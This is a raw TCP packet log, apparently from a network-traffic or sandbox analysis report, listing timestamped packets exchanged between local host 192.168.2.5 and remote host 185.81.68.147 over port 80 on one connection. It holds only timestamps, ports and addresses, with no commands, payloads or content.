Dec 13, 2024 01:37:12.833894968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.833950996 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.834676027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.834804058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.834856987 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.835581064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.835690975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.835750103 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.836508036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.836620092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.836683035 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.837415934 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.837531090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.837590933 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.838315964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.838450909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.838504076 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.839226961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.839364052 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.839421034 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.840136051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.840250015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.840310097 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.841116905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.841206074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.841286898 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.841986895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.842104912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.842158079 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.842928886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.843019009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.843074083 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.843739986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.895307064 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.987863064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.987941980 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.988027096 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.988276958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.988503933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.988549948 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.988594055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.989382982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.989444017 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.989474058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.990299940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.990345955 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.990411997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.991200924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.991242886 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.991309881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.992104053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.992146969 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.992178917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.993010044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.993077040 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.993114948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.993906975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.993948936 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.994023085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.994831085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.994873047 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.994950056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.995729923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.995778084 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.995809078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.996663094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.996707916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.996709108 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.997567892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.997631073 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.997668028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.998472929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.998513937 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.998589039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.999365091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.999411106 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.999488115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.000303984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.000344038 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.000387907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.001211882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.001250982 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.001317024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.002130985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.002171040 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.002265930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.003050089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.003091097 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.003102064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.003937960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.003985882 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.004031897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.004849911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.004914999 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.004951954 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.005745888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.005794048 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.005837917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.006633997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.006689072 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.006717920 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.007555008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.007606030 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.007687092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.008486032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.008542061 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.008569956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.009382963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.009433985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.009495020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.010287046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.010339022 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.010382891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.011234045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.011282921 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.011492968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.012123108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.012140036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.012172937 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.013025999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.013098955 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.013142109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.013919115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.013966084 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.014020920 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.014839888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.014889956 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.014983892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.015782118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.015832901 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.015877008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.016661882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.016711950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.016786098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.017607927 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.017657995 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.017740965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.018476963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.018531084 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.018574953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.019378901 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.019428968 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.019473076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.020296097 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.020344019 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.020411015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.021219969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.021281958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.021348000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.022139072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.022206068 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.022233963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.023029089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.023113012 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.023140907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.023930073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.023988008 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.024030924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.024885893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.024938107 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.024986982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.025762081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.025825024 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.025866985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.026657104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.026725054 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.026753902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.027570009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.027641058 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.027678967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.028479099 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.028552055 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.028620005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.029429913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.029495955 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.029522896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.030302048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.030365944 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.030402899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.031222105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.031286001 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.031336069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.032129049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.032208920 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.032228947 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.033023119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.033085108 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.033143997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.033931971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.033987045 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.034029007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.034847975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.034908056 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.034946918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.082820892 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.180090904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.180116892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.180265903 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.180459023 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.180490971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.180550098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.181230068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.181401968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.181448936 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.182180882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.182260990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.182301998 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.183028936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.183157921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.183197975 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.184043884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.184159040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.184200048 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.184865952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.185005903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.185045958 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.185765028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.185889959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.185929060 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.186676979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.186800957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.186844110 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.187592983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.187690973 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.187728882 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.188492060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.188596964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.188636065 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.189398050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.189544916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.189584017 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.190311909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.190428019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.190468073 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.191261053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.191339970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.191381931 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.192127943 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.192235947 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.192574024 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.193033934 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.193119049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.193165064 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.193948984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.194013119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.194057941 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.194884062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.195024967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.195100069 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.195776939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.195872068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.195919037 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.196680069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.196778059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.196830988 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.197611094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.197715044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.197762966 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.198494911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.198601961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.198651075 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.199397087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.199516058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.199563026 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.200309992 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.200565100 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.200613022 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.201248884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.201343060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.201405048 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.202125072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.202240944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.202290058 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.203042984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.203136921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.203208923 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.203968048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.204021931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.204061985 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.204855919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.204977989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.205019951 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.205761909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.205883026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.205935001 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.206249952 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.206691027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.206796885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.206861019 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.207582951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.207695007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.207748890 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.208504915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.208633900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.208673000 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.209412098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.209537983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.209580898 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.210311890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.210484982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.210551977 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.211236000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.211417913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.211474895 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.212143898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.212264061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.212306023 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.213037014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.213150978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.213191986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.213956118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.214071035 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.214118004 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.214854002 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.214963913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.215008974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.215785027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.215981960 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.216025114 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.216710091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.216814995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.216860056 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.217593908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.217664957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.217710972 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.218506098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.218600988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.218645096 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.219470978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.219552994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.219593048 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.220318079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.220386028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.220423937 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.221282959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.221405029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.221446037 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:13.222147942 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.222249985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:13.222289085 CET	49707	80	192.168.2.5	185.81.68.147
